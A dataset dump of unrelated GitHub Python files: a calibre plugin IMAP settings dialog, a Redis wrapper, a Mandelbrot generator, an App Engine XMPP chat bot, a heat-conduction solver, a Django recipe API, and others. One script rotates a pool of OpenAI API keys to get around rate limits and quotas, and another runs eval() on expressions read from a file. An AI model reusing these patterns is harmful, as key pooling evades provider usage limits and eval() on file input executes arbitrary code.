        self.imapsessionpass.setChecked(prefs['imapsessionpass'])
        self.l.addWidget(self.imapsessionpass,row,0,1,-1)
        row+=1
        label = QLabel(_('IMAP Folder Name'))
        tooltip = _("Name of IMAP folder to search for new emails. The folder (or label) has to already exist. Use INBOX for your default inbox.")
        label.setToolTip(tooltip)
        self.l.addWidget(label,row,0)
        self.imapfolder = QLineEdit(self)
        self.imapfolder.setToolTip(tooltip)
        self.imapfolder.setText(prefs['imapfolder'])
        self.l.addWidget(self.imapfolder,row,1)
        row+=1
        self.imapmarkread = QCheckBox(_('Mark Emails Read'),self)
        self.imapmarkread.setToolTip(_('If checked, emails will be marked as having been read if they contain any story URLs.'))
        self.imapmarkread.setChecked(prefs['imapmarkread'])
        self.l.addWidget(self.imapmarkread,row,0,1,-1)
        row+=1
        self.auto_reject_from_email = QCheckBox(_('Discard URLs on Reject List'),self)
        self.auto_reject_from_email.setToolTip(_('If checked, FanFicFare will silently discard story URLs from emails that are on your Reject URL List.<br>Otherwise they will appear and you will see the normal Reject URL dialog.<br>The Emails will still be marked Read if configured to.'))
        self.auto_reject_from_email.setChecked(prefs['auto_reject_from_email'])
        self.l.addWidget(self.auto_reject_from_email,row,0,1,-1)
        row+=1
        self.update_existing_only_from_email = QCheckBox(_('Update Existing Books Only'),self)
        self.update_existing_only_from_email.setToolTip(_('If checked, FanFicFare will silently discard story URLs from emails that are not already in your library.<br>Otherwise all story URLs, new and existing, will be used.<br>The Emails will still be marked Read if configured to.'))
        self.update_existing_only_from_email.setChecked(prefs['update_existing_only_from_email'])
        self.l.addWidget(self.update_existing_only_from_email,row,0,1,-1)
        row+=1
        self.download_from_email_immediately = QCheckBox(_('Download from Email Immediately'),self)
        self.download_from_email_immediately.setToolTip(_('If checked, FanFicFare will start downloading story URLs from emails immediately.<br>Otherwise the usual Download from URLs dialog will appear.'))
        self.download_from_email_immediately.setChecked(prefs['download_from_email_immediately'])
        self.l.addWidget(self.download_from_email_immediately,row,0,1,-1)
        row+=1
        label = QLabel(_('Add these Tag(s) Automatically'))
        tooltip = ( _("Tags entered here will be automatically added to stories downloaded from email story URLs.") +"\n"+
                    _("Any additional stories you then manually add to the Story URL dialog will also have these tags added.") )
        label.setToolTip(tooltip)
        self.l.addWidget(label,row,0)
        self.imaptags = EditWithComplete(self) # QLineEdit(self)
        self.imaptags.update_items_cache(self.plugin_action.gui.current_db.all_tags())
        self.imaptags.setToolTip(tooltip)
        self.imaptags.setText(prefs['imaptags'])
        self.imaptags.setCursorPosition(0)
        self.l.addWidget(self.imaptags,row,1)
        row+=1
        label = QLabel(_("<b>It's safest if you create a separate email account that you use only "
                         "for your story update notices. FanFicFare and calibre cannot guarantee that "
                         "malicious code cannot get your email password once you've entered it. "
                         "<br>Use this feature at your own risk. </b>"))
        label.setWordWrap(True)
        self.l.addWidget(label,row,0,1,-1,Qt.AlignTop)
        self.l.setRowStretch(row,1)
        row+=1
| JimmXinu/FanFicFare | calibre-plugin/config.py | config.py | py | 85,977 | python | en | code | 664 | github-code | 36 |
27278263299 | import redis
class RedisClient:
    """Thin wrapper around a redis-py connection to a Redis server."""

    def __init__(self, host='127.0.0.1', port=6379, db=0):
        # Connection parameters were previously hard-coded; they are now
        # keyword arguments with the same defaults, so existing callers
        # are unaffected while tests/other environments can override them.
        self.client = redis.Redis(
            host=host,
            port=port,
            db=db
        )

    def db_health(self):
        """Print whether the server answers PING; return True on success.

        redis-py raises ConnectionError when the server is unreachable
        (it does not return False), so the original ``else`` branch was
        dead code — catch the exception instead.
        """
        try:
            if self.client.ping():
                print("PONG")
                return True
        except redis.exceptions.ConnectionError:
            pass
        print("Connection failed to db")
        return False
| kliu2python/allsee | utils/redis_client.py | redis_client.py | py | 315 | python | en | code | 0 | github-code | 36 |
5514686481 | import numpy as np
def create_mandelbrot(size, maxiter):
    """Iterate z -> z**2 + c over a grid covering the given rectangle.

    size: (x1, y1, x2, y2) — coordinates of the top-left (x1, y1) and
        bottom-right (x2, y2) corners of the sampled rectangle in the
        complex plane.
    maxiter: number of iterations; it also controls the grid resolution,
        since the sampling step is (x2 - x1) / maxiter per axis.

    Returns the complex array z after maxiter iterations of
    z_n = z_{n-1}**2 + c with z_0 = 0.  Points outside the Mandelbrot
    set diverge and saturate to inf/nan; callers typically inspect
    np.abs(z) to decide membership.
    """
    x1, y1, x2, y2 = size
    dx = (x2 - x1) / maxiter
    dy = (y2 - y1) / maxiter
    # +dx/+dy on the stop value so the far edge of the rectangle is included.
    x, y = np.mgrid[x1:x2 + dx:dx, y1:y2 + dy:dy]
    c = x + y * 1j
    z = np.zeros_like(c, dtype=np.complex128)
    # Diverging points legitimately overflow to inf/nan; suppress the
    # noisy RuntimeWarnings NumPy would otherwise emit for them.
    with np.errstate(over='ignore', invalid='ignore'):
        for _ in range(maxiter):
            z = z ** 2 + c
    return z
| copilot-deboches/algoritimos | python/mandelbrot_set.py | mandelbrot_set.py | py | 699 | python | en | code | 0 | github-code | 36 |
70811192105 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
import logging
import datetime
from google.appengine.api import xmpp
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import taskqueue
import gaetalk
import config
import utils
class XMPPSub(webapp.RequestHandler):
  """Handles an incoming subscription (someone added the bot).

  May be triggered multiple times for the same JID.
  """
  def post(self):
    sender = self.request.get('from')
    gaetalk.try_add_user(sender)
class XMPPUnsub(webapp.RequestHandler):
  """Handles an unsubscription (someone removed the bot)."""
  def post(self):
    # NOTE: because of the gtalk client's poor error handling, a
    # command-based way to leave is provided elsewhere as well.
    sender = self.request.get('from')
    lock = utils.MemLock('delete_user')
    lock.require()
    try:
      gaetalk.del_user(sender)
    finally:
      lock.release()
class XMPPMsg(webapp.RequestHandler):
  """Forwards incoming chat messages to the gaetalk dispatcher."""
  def post(self):
    try:
      gaetalk.handle_message(xmpp.Message(self.request.POST))
    except xmpp.InvalidMessageError:
      logging.info('InvalidMessageError: %r' % self.request.POST)
class XMPPAvail(webapp.RequestHandler):
  def post(self):
    '''Presence update. `show` can be away, dnd (busy) or empty (online).'''
    jid, resource = self.request.get('from').split('/', 1)
    status = self.request.get('status')
    show = self.request.get('show')
    logging.debug(u'%s 的状态: %s (%s)' % (jid, status, show))
    # Map the raw XMPP show value onto gaetalk's status constants;
    # ignore senders using unknown codes.
    try:
      show = gaetalk.STATUS_CODE[show]
    except KeyError:
      logging.error('%s has sent an incorrect show code %s' % (jid, show))
      return
    # Answer with our own presence; give up on XMPP-level failures.
    try:
      gaetalk.send_status(self.request.get('from'))
    except xmpp.Error:
      logging.error('Error while sending presence to %s' % jid)
      return
    u = gaetalk.get_user_by_jid(jid)
    if u is not None:
      modified = False
      # Each connected client resource is tracked separately.
      if resource not in u.resources:
        u.resources.append(resource)
        modified = True
      if u.avail != show:
        # Transition from offline counts as a fresh online timestamp.
        if u.avail == gaetalk.OFFLINE:
          u.last_online_date = datetime.datetime.now()
        u.avail = show
        modified = True
      if modified:
        # Log the status change before persisting the user entity.
        gaetalk.log_onoff(u, show, resource)
        u.put()
      # Talk.v105 clients transmit in plain text — warn the user
      # (message text is user-facing and intentionally left in Chinese).
      if config.warnGtalk105 and resource.startswith('Talk.v105'):
        xmpp.send_message(jid, u'您的客户端使用明文传输数据,为了大家的安全,请使用Gtalk英文版或者其它使用SSL加密的客户端。')
    else:
      # Unknown JID: treat this presence as a new user joining.
      gaetalk.try_add_user(jid, show, resource)
class XMPPUnavail(webapp.RequestHandler):
  """Queues offline processing when a client resource goes unavailable."""
  def post(self):
    full_jid = self.request.get('from')
    jid, resource = full_jid.split('/', 1)
    logging.info(u'%s 下线了' % jid)
    payload = {'jid': jid, 'resource': resource}
    taskqueue.add(url='/_admin/queue', queue_name='userunavailable', params=payload)
class XMPPProbe(webapp.RequestHandler):
  """Replies to presence probes with the bot's current status."""
  def post(self):
    probed_by = self.request.get('from')
    try:
      gaetalk.send_status(probed_by)
    except xmpp.Error:
      logging.error('Error while sending presence to %s' % probed_by)
class XMPPDummy(webapp.RequestHandler):
  """No-op handler for XMPP events that require no action."""
  def post(self):
    pass
class UserUnavailable(webapp.RequestHandler):
  """Task-queue worker: drops one resource from a user's presence list.

  Queued by XMPPUnavail whenever a client resource goes offline.
  """
  def post(self):
    jid = self.request.get('jid')
    resource = self.request.get('resource')
    u = gaetalk.get_user_by_jid(jid)
    if u is None or resource not in u.resources:
      return
    u.resources.remove(resource)
    if not u.resources:
      # Last resource gone: the user is now fully offline.
      u.avail = gaetalk.OFFLINE
      u.last_offline_date = datetime.datetime.now()
      u.put()
      gaetalk.log_onoff(u, gaetalk.OFFLINE, resource)
    else:
      # BUG FIX: the original only called u.put() when the resource list
      # became empty, so removing one of several resources was never
      # persisted and stale resources accumulated in the datastore.
      u.put()
# URL routes: GAE XMPP webhooks plus the internal task-queue endpoint.
_ROUTES = [
  ('/_ah/xmpp/subscription/subscribed/', XMPPSub),
  ('/_ah/xmpp/subscription/unsubscribed/', XMPPUnsub),
  ('/_ah/xmpp/message/chat/', XMPPMsg),
  ('/_ah/xmpp/presence/available/', XMPPAvail),
  ('/_ah/xmpp/presence/unavailable/', XMPPUnavail),
  ('/_ah/xmpp/presence/probe/', XMPPProbe),
  ('/_ah/xmpp/subscription/subscribe/', XMPPDummy),
  ('/_ah/xmpp/subscription/unsubscribe/', XMPPDummy),
  ('/_admin/queue', UserUnavailable),
]
application = webapp.WSGIApplication(_ROUTES, debug=True)
def main():
  """CGI entry point: serve the module-level WSGI application."""
  run_wsgi_app(application)


if __name__ == '__main__':
  main()
| lilydjwg/gaetalk | chatmain.py | chatmain.py | py | 4,035 | python | en | code | 22 | github-code | 36 |
9340019814 | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 21 11:01:53 2017
@author: PiotrTutak
"""
import numpy as np
import scipy.linalg as lg
import matplotlib.pyplot as plt
# Assembles and solves a 5-node linear system built from element
# conductances C_e = k*S/L_e — looks like a 1-D steady-state heat
# conduction FEM/finite-difference model with a flux BC on one end and a
# convective BC on the other; TODO confirm against the assignment text.

# Element lengths L1..L4 (prompt text is Polish: "enter L1 L2 L3 L4").
print("Podaj L1 L2 L3 L4")
L=[float(x) for x in input().strip().split()]
# Material/BC data: conductivity k, cross-section S, flux q,
# convection coefficient alfa, ambient temperature tInf.
print('Podaj k S q alfa tInf')
k,S,q,alfa,tInf=(float(x) for x in input().strip().split())
# Per-element conductance.
C=[k*S/l for l in L]
# Replace element lengths with cumulative node coordinates (for plotting).
L=[sum(L[:i]) for i in range(len(L)+1)]
# Global coefficient matrix; alfa*S in the last diagonal entry adds the
# convective boundary term at the final node.
A=np.array([
        [C[0],-C[0],0,0,0],
        [-C[0],C[0]+C[1],-C[1],0,0],
        [0,-C[1],C[1]+C[2],-C[2],0],
        [0,0,-C[2],C[2]+C[3],-C[3]],
        [0,0,0,-C[3],C[3]+alfa*S]
    ])
# Right-hand side: imposed flux at the first node, convection at the last.
P=np.array([
        q*S,
        0,
        0,
        0,
        -alfa*S*tInf
    ])
P=-P
#t=np.linalg.solve(A,P)
t=lg.solve(A,P)  # nodal temperatures
print(t)
plt.plot(L,t,'ro')
plt.show()
| ptutak/MES | zad01.py | zad01.py | py | 748 | python | en | code | 0 | github-code | 36 |
43823721553 | import json
import random
import re
import os
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from tqdm import tqdm
import requests
from template import *
# Local HTTP proxy for OpenAI requests (currently unused: the
# requests.post proxies argument is commented out below).
proxies = {
    'http': '127.0.0.1:9898',
    'https': '127.0.0.1:9898',
}
# ori_keys maps api-key -> still-valid flag (persisted back to the JSON
# file by process_all_data); the lists below track runtime key state.
ori_keys = json.load(open("../../data/120_key1.json"))
keys = [key for key, v in ori_keys.items() if v]
unused_keys = keys.copy()  # available for the next request
used_keys = []             # currently checked out by a worker thread
overload_keys = []         # (key, timestamp) pairs cooling down after a rate-limit error
invalid_keys = []          # quota exhausted; flagged False in ori_keys on completion
def get_valid_key():
    """Check out one usable API key from the shared pool.

    Rate-limited ("overloaded") keys are recycled back into the pool
    once their 60-second cool-down has elapsed.  Blocks (polling every
    5 s) until a key becomes available, then moves the chosen key from
    unused_keys to used_keys and returns it.
    """
    global unused_keys, used_keys, overload_keys

    def _recycle_overloaded():
        # Move overloaded keys whose 60 s cool-down has elapsed back into
        # the unused pool.
        global unused_keys, overload_keys
        now = time.time()
        still_overloaded = []
        for key, stamp in overload_keys:
            if now - stamp >= 60:
                unused_keys.append(key)
            else:
                still_overloaded.append((key, stamp))
        overload_keys = still_overloaded

    _recycle_overloaded()
    # BUG FIX: the original recycled overloaded keys only once, *before*
    # this wait loop — with an empty pool it slept forever even though
    # keys became eligible again after 60 s.  Re-check on every poll.
    while not unused_keys:
        time.sleep(5)
        _recycle_overloaded()
    key = random.choice(unused_keys)
    unused_keys.remove(key)
    used_keys.append(key)
    return key
def make_chat_request(prompt, max_length=1024, timeout=10, logit_bias=None, max_retries=5):
    """Send one chat-completion request, rotating through the key pool.

    Retries up to max_retries times, checking out a fresh key per
    attempt.  On HTTP 200 the key is returned to the pool and the parsed
    JSON body is returned.  On an API error the key is quarantined
    (invalid_keys when the quota is exhausted, overload_keys otherwise).
    On a network error the timeout is increased and logit_bias shrunk
    before retrying.  Returns None when every attempt fails.
    """
    global unused_keys, used_keys, overload_keys
    for _attempt in range(max_retries):
        key = get_valid_key()
        try:
            with requests.post(
                url="https://api.openai.com/v1/chat/completions",
                headers={"Authorization": f"Bearer {key}"},
                json={
                    "model": "gpt-3.5-turbo",
                    "temperature": 1.0,
                    "messages": [{'role': 'user', 'content': prompt}],
                    "max_tokens": max_length,
                    "top_p": 1.0,
                    "logit_bias": logit_bias,
                },
                timeout=timeout
            ) as resp:
                # Parse the body once instead of re-decoding it three times.
                body = json.loads(resp.content)
                if resp.status_code == 200:
                    used_keys.remove(key)
                    unused_keys.append(key)
                    return body
                error = body.get('error')
                if error:
                    print(error)
                    # BUG FIX: the key was previously left in used_keys
                    # forever on this path.
                    used_keys.remove(key)
                    if error['message'] == "You exceeded your current quota, please check your plan and billing details.":
                        invalid_keys.append(key)
                    else:
                        overload_keys.append((key, time.time()))
        except requests.exceptions.RequestException as e:
            used_keys.remove(key)
            unused_keys.append(key)
            timeout += 5
            if timeout >= 20:
                # Repeated timeouts: fall back to a fixed newline-suppressing bias.
                logit_bias = {"13": -100, "4083": -100}
                print(f"Error with key {key}: {e}")
            elif logit_bias:
                # Halve the bias dict to lighten the request.
                # BUG FIX: the original called .items() unconditionally and
                # crashed with AttributeError when logit_bias was still None.
                logit_bias = dict(list(logit_bias.items())[:int(len(logit_bias) / 2)])
def get_uncompleted_data(file_path, out_path):
    """Return input records (from file_path) whose uuid has no successful
    output in out_path, after rewriting out_path to keep only records
    belonging to successfully completed uuids."""
    all_uuids = set()
    for line in open(file_path):
        all_uuids.add(json.loads(line)["uuid"])

    finished = set()
    for line in open(out_path):
        record = json.loads(line)
        if record["output"] != ["network error"]:
            finished.add(record['input']["uuid"])

    # Keep every output record whose uuid completed successfully
    # (even an earlier failed attempt for that same uuid).
    kept = []
    for line in open(out_path):
        record = json.loads(line)
        if record['input']["uuid"] in finished:
            kept.append(record)

    remaining = all_uuids - finished
    if remaining:
        with open(out_path, "w") as f:
            for record in kept:
                f.write(json.dumps(record) + "\n")

    pending = []
    for line in open(file_path):
        record = json.loads(line)
        if record["uuid"] in remaining:
            pending.append(record)
    return pending
def pross_answer(input_string):
    """Normalize a model reply: collapse any answer that begins with
    yes/no/unknown down to that single token; everything else is
    returned unchanged."""
    for token in ("yes", "no", "unknown"):
        if input_string.startswith(token):
            return token
    return input_string
def process_one_data(args):
    """Run a single query against the chat API and append the result to
    the relation's output file.

    args: (data, relation, mode) — data is either a dict or its string
    repr (records round-trip through text files as repr strings).
    Returns "success" after the result has been written.
    """
    import ast  # local import: only needed here, keeps the fix self-contained

    data, relation, mode = args
    try:
        # SECURITY FIX: the original used eval() on file-sourced text.
        # literal_eval only accepts Python literals (dicts, lists,
        # strings, numbers), which is all a serialized record contains.
        data = ast.literal_eval(data)
    except Exception:
        # Already a dict (or not a parseable literal) — use it as-is,
        # matching the original fallback behaviour.
        pass
    prompt, logit_bias = data['query']["prompt"], data['query']["logit_bias"]
    answer = make_chat_request(prompt, logit_bias=logit_bias)
    try:
        answer = answer['choices'][0]['message']['content']
        answer = pross_answer(answer.strip().lower())
    except Exception:
        # Request failed (make_chat_request returned None) or the
        # response was malformed — record a sentinel instead.
        answer = ["network error"]
    item = {
        "input": data,
        "output": answer
    }
    with open(f"./data/{mode}/query_result/{relation}.json", "a") as f:
        f.write(json.dumps(item) + "\n")
    return "success"
def process_all_data(data_list, relation, mode):
    """Fan the queries for one relation out over a thread pool, then
    persist which keys turned out to be invalid."""
    results = []
    # One thread per available key, capped at the CPU count.
    max_threads = min(os.cpu_count(), len(keys) - len(invalid_keys))
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        futures = {executor.submit(process_one_data, (data, relation, mode)): data for data in data_list}
        # NOTE(review): relation_list is not defined in this module's
        # visible scope — presumably a module-level list of all
        # relations; confirm before refactoring.
        with tqdm(total=len(data_list), desc=f"{relation, relation_list.index(relation)}") as progress_bar:
            for future in as_completed(futures):
                try:
                    result = future.result()
                    results.append(result)
                except Exception as e:
                    print(f"Error occurred while processing data: {e}")
                progress_bar.update(1)
    # Flag quota-exhausted keys as disabled ...
    for id in invalid_keys:
        ori_keys[id] = False
    # ... and write the updated key flags back to the JSON file.
    with open("../../data/120_key1.json", 'w') as file:
        json.dump(ori_keys, file)
| bigdante/nell162 | backup/verification/chatgpt_gen_yes_no/utils.py | utils.py | py | 5,313 | python | en | code | 0 | github-code | 36 |
def read_reversed_graph(edge_number):
    """Read edge_number two-token lines from stdin and return a reversed
    adjacency map: second token -> [first token, ...] (used here as
    child -> parents for the ancestor query)."""
    graph = {}
    for _ in range(edge_number):
        first, second = input().split()
        graph.setdefault(second, []).append(first)
    return graph
def define_ancestor(tree, v1, v2):
    """Return the lowest common ancestor of v1 and v2.

    tree maps each node to a single-element list holding its parent;
    the root node is absent from the mapping.
    """
    q1 = [v1]
    q2 = [v2]
    # Climb both paths one level per step until the tips coincide
    # (at the latest, on the root).
    while q1[-1] != q2[-1]:
        if tree.get(q1[-1], []):
            q1.append(tree.get(q1[-1], [])[0])
        if tree.get(q2[-1], []):
            q2.append(tree.get(q2[-1], [])[0])
    # Compare the paths from the meeting point downwards; the node just
    # above the first divergence is the LCA.
    for i in range(-1, -min(len(q1), len(q2)) - 1, -1):
        if q1[i] != q2[i]:
            return q1[i + 1]
    # BUG FIX: when no divergence exists within the shorter path, one
    # node is an ancestor of the other (or v1 == v2).  The original fell
    # off the loop and returned None here; the answer is the shallower
    # node itself — the top of the common suffix.
    return q1[-min(len(q1), len(q2))]
# Read the two query nodes, then the edge count plus the (reversed)
# tree, and print their lowest common ancestor.
vx1, vx2 = map(str, input().split())
my_graph = read_reversed_graph(int(input()))
print(define_ancestor(my_graph, vx1, vx2))
| andrewsonin/4sem_fin_test | _19_tree_common_ancestor.py | _19_tree_common_ancestor.py | py | 704 | python | en | code | 0 | github-code | 36 |
74704594025 | import pandas as pd
import numpy as np
import regex as re
# the usual import horror in python
# https://stackoverflow.com/questions/35166821/valueerror-attempted-relative-import-beyond-top-level-package
from ...config.config import Config
class ExperimentalPlan:
'''
Class for creating an experimental Plan based on DoE.
planType [str]: type of doe plan (e.g. plackett-burrmann, lhs, ...)
planType [str]: configuration params for the DoE plan (e.g.
number of factors, number of levels, ...). Depends
on pyDOE2 specs.
rawPlan [np.array]: raw plan with abstract values (usually -1,0,
1 but depends on type)
factorPlan [pd.DataFrame]: plan with real factor values
nrTests [int]: number of tests runs of the plan
'''
def __init__(self, config: Config):
self.factorFile = 'factors.csv'
self.planType = config.planType
self.rawPlan = np.array(0)
self.factorPlan = pd.DataFrame()
self.factorList = []
self.nrTests = 0
print('\t\tExperimental Plan created: plan_%s.csv'%config.planType )
def setNrTests(self):
self.nrTests = len(self.rawPlan)
def setFactorList(self):
self.factorList = list(pd.read_csv(self.factorFile, index_col='name').index)
def convertPlanToRangeZeroOne(self):
rawPlanRangeZeroOne = np.zeros((len(self.rawPlan[:, 0]), len(self.rawPlan[0, :])))
# loop through columns of rawPlan
for j in range(len(self.rawPlan[0, :])):
factorCol = self.rawPlan[:, j]
mini = min(factorCol)
maxi = max(factorCol)
# loop through rows of rawPlan
for i in range(len(factorCol)):
currentCell = float(self.rawPlan[i, j])
rawPlanRangeZeroOne[i, j] = 0 + (1 - 0) * (currentCell - mini) / (maxi - mini)
self.rawPlan = rawPlanRangeZeroOne
def printFactorPlanToFile(self, pathToPlanFile):
self.factorPlan.to_csv(pathToPlanFile)
def printRawPlanToFile(self, pathToRawPlanFile):
pd.DataFrame(self.rawPlan).to_csv(pathToRawPlanFile,
header=self.factorList)
def getFactorValuesOfTestRun(self, testNr):
return dict(self.factorPlan.iloc[testNr])
def checkFactorMatchingToRawPlan(self):
# checking that numbers of factors in factors.csv matches the
# configuration parameters from *.conf
nrFactorsCSV = len(self.factorList)
nrFactorsRawPlan = len(self.rawPlan[0, :])
if nrFactorsCSV != nrFactorsRawPlan:
raise ValueError(
'The number of factors in factors.csv does not match to the plan created with config.conf.')
def convertRawPlanToFactorPlan(self, pathToFactorFile):
dfFactors = pd.read_csv(pathToFactorFile, index_col='name')
self.factorPlan = pd.DataFrame(self.rawPlan.copy())
self.factorPlan.columns = self.factorList
# loop through all factors (columns of rawPlan)
j = 0
factorsWithExprList = []
posOfFactorWithExpr = []
for factor in self.factorList:
factorCol = self.rawPlan[:, j].copy()
factorMin = str(dfFactors.loc[factor].at['min'])
factorMax = str(dfFactors.loc[factor].at['max'])
# check if factor min is a number (float or int)
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMin) is None \
or re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMax) is None:
# if true factorMin/Max should be a math expression like 'a+b/2'
# it is necessary to save these columns for later because they
# depend on other factors values which need to be calculated first
factorsWithExprList.append(factor)
posOfFactorWithExpr.append(j)
# these are dummy values that no error occurs
factorMin = 0
factorMax = 0
factorMin = float(factorMin)
factorMax = float(factorMax)
factorCol *= factorMax - factorMin
factorCol += factorMin
# overwrite column of factorPlan
self.factorPlan[factor] = factorCol
j += 1
# loop through the previous saved factor with expression in factorMin/Max
factorRegex = '|'.join(self.factorList)
j = 0
for factorWithExpr in factorsWithExprList:
factorCol = self.rawPlan[:, posOfFactorWithExpr[j]]
factorMin = str(dfFactors.loc[factorWithExpr].at['min'])
factorMax = str(dfFactors.loc[factorWithExpr].at['max'])
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMin) is None:
factorMin = self.__calcMinMaxForStrExpression(factorCol, factorRegex, factorMin)
else:
factorMin = float(factorMin)
if re.match('[\-|\+]?[0-9]+[\.]?[0-9]*', factorMax) is None:
factorMax = self.__calcMinMaxForStrExpression(factorCol, factorRegex, factorMax)
else:
factorMax = float(factorMax)
factorCol *= factorMax - factorMin
factorCol += factorMin
# overwrite column of factorPlan
self.factorPlan[factorWithExpr] = factorCol
j += 1
def __calcMinMaxForStrExpression(self, factorCol, factorRegex, minMax):
minMaxCol = np.zeros(len(factorCol))
# loop through all tests
i = 0
for testNr in range(len(factorCol)):
# get all factors, operators (+-*/) and number (float or int)
expressionList = re.findall('%s|[+|\-|\*|/]|[[0-9]+[\.]?[0-9]*' % (factorRegex), minMax)
# extract factors from expressionlist
factorsInExprList = list(set(expressionList) & set(self.factorList))
# calculate values for factor with min or max
for factorInExpr in factorsInExprList:
factorValue = self.factorPlan.loc[i].at[factorInExpr]
factorExpr = minMax.replace(factorInExpr, str(factorValue))
# calculate expression
minMaxCol[i] = eval(factorExpr)
i += 1
return minMaxCol
| csRon/autodoe | src/preProcessor/experimentalPlans/experimentalPlan.py | experimentalPlan.py | py | 6,290 | python | en | code | 0 | github-code | 36 |
3276810925 | from django.contrib.auth import get_user_model
from django.db.models import F, Sum
from django.http.response import HttpResponse
from django_filters.rest_framework import DjangoFilterBackend
from djoser.views import UserViewSet as DjoserUserViewSet
from recipes.models import (AmountIngredientRecipe, Favorite, Follow,
Ingredient, Recipe, ShoppingCart, Tag)
from rest_framework import permissions, status, viewsets
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from .filters import IngredientFilter, RecipeFilter
from .mixins import FavoriteShoppingcartMixin
from .permissions import IsOwnerAdminOrReadOnly
from .serializers import (FollowSerializer, IngredientSerializer,
RecipesSerializer, TagSerializer)
User = get_user_model()
class UsersViewSet(DjoserUserViewSet):
"""Вьюсет для пользователей"""
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[permissions.IsAuthenticated],
)
def subscribe(self, request, id):
"""
Создаётся или удаляется подписка на пользователя.
:param request: данные запроса.
:param pk: id пользователя на которого нужно подписаться(отписаться).
:return:
"""
user = request.user
author = get_object_or_404(User, id=id)
is_subscribed = Follow.objects.filter(
user=user,
author=author
).exists()
if request.method == 'DELETE':
if not is_subscribed:
return Response(
{'errors': 'Вы не были подписаны на этого автора'},
status=status.HTTP_400_BAD_REQUEST
)
Follow.objects.get(user=user, author=author).delete()
return Response(status=status.HTTP_204_NO_CONTENT)
if user == author:
return Response(
{'errors': 'Подписка самого на себя невозможна'},
status=status.HTTP_400_BAD_REQUEST
)
if is_subscribed:
return Response(
{'errors': 'Вы уже подписаны на этого пользователя'},
status=status.HTTP_400_BAD_REQUEST
)
Follow.objects.create(user=user, author=author)
serializer = FollowSerializer(
author,
context={'request': request}
)
return Response(serializer.data, status=status.HTTP_201_CREATED)
@action(
methods=['get'],
detail=False,
permission_classes=[permissions.IsAuthenticated],
)
def subscriptions(self, request):
"""
Получаем всех пользователей на которых подписан.
:param request: данные запроса.
:return: Возвращает сериализованные данные через FollowSerializer
с пагинацией.
"""
queryset = User.objects.filter(following__user_id=request.user.id)
page = self.paginate_queryset(queryset)
serializer = FollowSerializer(
page,
many=True,
context={'request': request}
)
return self.get_paginated_response(serializer.data)
class TagViewSet(viewsets.ReadOnlyModelViewSet):
"""
Вьюсет для тегов.
Теги доступны только для чтения.
"""
queryset = Tag.objects.all()
serializer_class = TagSerializer
pagination_class = None
class IngredientViewSet(viewsets.ReadOnlyModelViewSet):
"""
Вьюсет для ингредиентов.
Теги доступны только для чтения.
"""
queryset = Ingredient.objects.all()
serializer_class = IngredientSerializer
pagination_class = None
filter_backends = (DjangoFilterBackend,)
filterset_class = IngredientFilter
class RecipesViewSet(viewsets.ModelViewSet, FavoriteShoppingcartMixin):
"""Вьюсет для рецептов"""
queryset = Recipe.objects.all()
serializer_class = RecipesSerializer
permission_classes = (IsOwnerAdminOrReadOnly,)
filter_backends = (DjangoFilterBackend,)
filterset_class = RecipeFilter
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def favorite(self, request, pk):
"""
Добавляет(удаляет) рецепт в избранное пользователя.
:param pk: id добавляемого рецепта.
:param request: данные запроса.
:return: Возвращает сериализованный рецепт, который добавили
или удалили из избранного.
"""
return self.add_del_to_db(
request=request,
pk=pk,
related_model=Favorite
)
@action(
methods=['post', 'delete'],
detail=True,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def shopping_cart(self, request, pk):
"""
Добавляет(удаляет) рецепт в корзину для покупок.
:param pk: id добавляемого рецепта.
:param request: данные запроса.
:return: Возвращает сериализованный рецепт, который добавили
или удалили в корзину для покупок.
"""
return self.add_del_to_db(
request=request,
pk=pk,
related_model=ShoppingCart
)
@action(
methods=['get'],
detail=False,
permission_classes=[IsOwnerAdminOrReadOnly],
)
def download_shopping_cart(self, request):
"""
Формирует файл списка продуктов из рецептов в списке покупок.
:param request:
:return:
"""
user = request.user
if user.is_anonymous:
raise permissions.exceptions.AuthenticationFailed
if not user.shoppingcart.all().exists():
return Response(status=status.HTTP_400_BAD_REQUEST)
recipes_of_user = user.shoppingcart.values('recipe')
ingredients_in_recipes = AmountIngredientRecipe.objects.filter(
recipe__in=recipes_of_user
)
sum_ingredients = ingredients_in_recipes.values(
ingredient_name=F('ingredient__name'),
measurement_unit=F('ingredient__measurement_unit')
).annotate(amount=Sum('amount'))
list_ingredients = (f'Список продуктов для пользователя с именем: '
f'{user.get_full_name()}\n\n')
for ingredient in sum_ingredients:
ingredient_str = (f'{ingredient["ingredient_name"]} '
f'({ingredient["measurement_unit"]}) - '
f'{ingredient["amount"]}\n')
list_ingredients += ingredient_str
file_name = f'shopping_cart_{user.username}.txt'
response = HttpResponse(
content=list_ingredients,
content_type='text/plain; charset=utf-8',
status=status.HTTP_200_OK,
)
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
| MihVS/foodgram-project-react | backend/foodgram/api/views.py | views.py | py | 7,796 | python | ru | code | 0 | github-code | 36 |
6690254075 | class BonusCardType:
BONUS_CARD = 'BonusCard'
UNIVERSAL_CARD = 'UniversalCard'
RZHD_BINNUS_DISCOUNT = 'RzdBonusDiscount'
class SegmentType:
# Неопределенный
UNKNOWN = 'Unknow'
# Одиночный ЖД сегмент
RAILWAY = 'Railway'
# Паромный сегмент
FERRY = 'Ferry'
# ЖД сегмент, но в заказе еще есть паромный сегмент
RAILWAY_FERRY = 'Railwaywithferry'
# Автобусный сегмент
BUS = 'Bus'
# ЖД сегмент, но в заказе есть еще сегмент с автобусом
RAILWAY_BUS = 'Railwaywithbus'
# ЖД сегмент, но в заказе есть еще паромный сегмент и сегмент с автобусом
RAILWAY_BUS_FERRY = 'Railwaywithbusandferry'
# Направление туда
THERE = 'There'
# Направление обратно
BACK = 'Back'
# ЖД сегмент, направление туда
